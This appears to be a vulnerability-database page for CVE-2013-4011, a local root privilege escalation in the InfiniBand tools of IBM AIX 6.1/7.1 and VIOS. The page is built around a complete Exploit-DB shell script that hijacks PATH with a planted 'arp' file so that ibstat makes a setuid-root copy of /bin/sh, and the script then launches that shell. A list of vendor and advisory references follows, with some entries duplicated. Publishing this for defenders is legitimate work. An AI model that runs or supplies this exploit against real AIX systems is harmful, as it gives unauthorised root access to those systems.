CVE-2013-4011
Description
Multiple unspecified vulnerabilities in the InfiniBand subsystem in IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02, allow local users to gain privileges via vectors involving (1) arp.ib or (2) ibstat.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
IBM AIX 6.1/7.1 - Local Privilege Escalation
# Exploit-DB Note: Screenshot provided by exploit author
#
#!/bin/sh
# Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation
# Date: 2013-09-24
# Exploit Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com>
# Vendor Homepage: http://www.ibm.com
# Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html
# Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02
# Tested on: IBM AIX 6.1
# CVE: CVE-2013-4011
echo '
mm mmmmm m m
## # # #
# # # ##
#mm# # m""m
# # mm#mm m" "m
'
echo "[*] AIX root privilege escalation"
echo "[*] Kristian Erik Hermansen"
echo "[*] https://linkedin.com/in/kristianhermansen"
echo "
+++++?????????????~.:,.:+???????????++++
+++++???????????+...:.,.,.=??????????+++
+++???????????~.,:~=~:::..,.~?????????++
+++???????????:,~==++++==~,,.?????????++
+++???????????,:=+++++++=~:,,~????????++
++++?????????+,~~=++++++=~:,,:????????++
+++++????????~,~===~=+~,,::,:+???????+++
++++++???????=~===++~~~+,,~::???????++++
++++++++?????=~=+++~~~:++=~:~+???+++++++
+++++++++????~~=+++~+=~===~~:+??++++++++
+++++++++?????~~=====~~==~:,:?++++++++++
++++++++++????+~==:::::=~:,+??++++++++++
++++++++++?????:~~=~~~~~::,??+++++++++++
++++++++++?????=~:~===~,,,????++++++++++
++++++++++???+:==~:,,.:~~..+??++++++++++
+++++++++++....==+===~~=~,...=?+++++++++
++++++++,........~=====..........+++++++
+++++................................++=
=+:....................................=
"
TMPDIR=/tmp
TAINT=${TMPDIR}/arp
RSHELL=${TMPDIR}/r00t-sh
cat > ${TAINT} <<-!
#!/bin/sh
cp /bin/sh ${RSHELL}
chown root ${RSHELL}
chmod 4555 ${RSHELL}
!
chmod 755 ${TAINT}
PATH=.:${PATH}
export PATH
cd ${TMPDIR}
/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null
if [ -e ${RSHELL} ]; then
echo "[+] Access granted. Don't be evil..."
${RSHELL}
else
echo "[-] Exploit failed. Try some 0day instead..."
fi
ibstat $PATH - Local Privilege Escalation (Metasploit)
Metasploit modules
References
- http://aix.software.ibm.com/aix/efixes/security/infiniband_advisory.asc
- http://osvdb.org/95419
- http://osvdb.org/95420
- http://secunia.com/advisories/54215
- http://www.ibm.com/support/docview.wss?uid=isg1IV43561
- http://www.ibm.com/support/docview.wss?uid=isg1IV43562
- http://www.ibm.com/support/docview.wss?uid=isg1IV43580
- http://www.ibm.com/support/docview.wss?uid=isg1IV43582
- http://www.ibm.com/support/docview.wss?uid=isg1IV43756
- http://www.ibm.com/support/docview.wss?uid=isg1IV43827
- http://www.securityfocus.com/bid/61287
- http://www.securitytracker.com/id/1028792
- https://exchange.xforce.ibmcloud.com/vulnerabilities/85617
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19167
- http://aix.software.ibm.com/aix/efixes/security/infiniband_advisory.asc
- http://osvdb.org/95419
- http://osvdb.org/95420
- http://secunia.com/advisories/54215
- http://www.ibm.com/support/docview.wss?uid=isg1IV43561
- http://www.ibm.com/support/docview.wss?uid=isg1IV43562
- http://www.ibm.com/support/docview.wss?uid=isg1IV43580
- http://www.ibm.com/support/docview.wss?uid=isg1IV43582
- http://www.ibm.com/support/docview.wss?uid=isg1IV43756
- http://www.ibm.com/support/docview.wss?uid=isg1IV43827
- http://www.securityfocus.com/bid/61287
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.